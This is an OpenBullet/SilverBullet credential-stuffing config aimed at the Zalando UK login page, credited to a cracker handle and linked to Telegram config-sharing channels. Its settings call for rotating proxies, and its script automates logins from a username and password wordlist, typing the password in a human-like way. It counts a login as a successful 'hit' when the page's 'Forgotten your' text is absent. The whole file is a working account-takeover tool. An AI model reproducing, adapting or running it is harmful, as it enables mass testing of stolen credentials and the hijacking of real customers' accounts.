[SETTINGS]
{
  "Name": "ZALANDO.CO.UK @King_Cracked",
  "SuggestedBots": 5,
  "MaxCPM": 0,
  "LastModified": "2022-06-14T02:02:31.11173+05:30",
  "AdditionalInfo": "https://t.me/Config_list /https://t.me/OPEN_BUILLET_Configs",
  "RequiredPlugins": [],
  "Author": "@King_Cracked",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": true,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "ZALANDO.CO.UK   sedlyf6969   xreactor",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
BROWSERACTION Open 

NAVIGATE "https://www.zalando.co.uk/login/" 30 

ELEMENTACTION XPath "//*[@id=\"login.email\"]" 
  WaitForElement 

ELEMENTACTION XPath "//*[@id=\"login.email\"]" 
  SendKeys "<USER>" 

ELEMENTACTION XPath "//*[@id=\"login.secret\"]" 
  SendKeysHuman "<PASS>" 

ELEMENTACTION XPath "//*[@id=\"sso\"]/div/div[2]/main/div/div[2]/div/div/div/form/button" 
  Click 

BROWSERACTION DOMtoSOURCE 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Forgotten your" 
  KEYCHAIN Success OR 
    KEY "<SOURCE>" DoesNotContain "Forgotten your" 

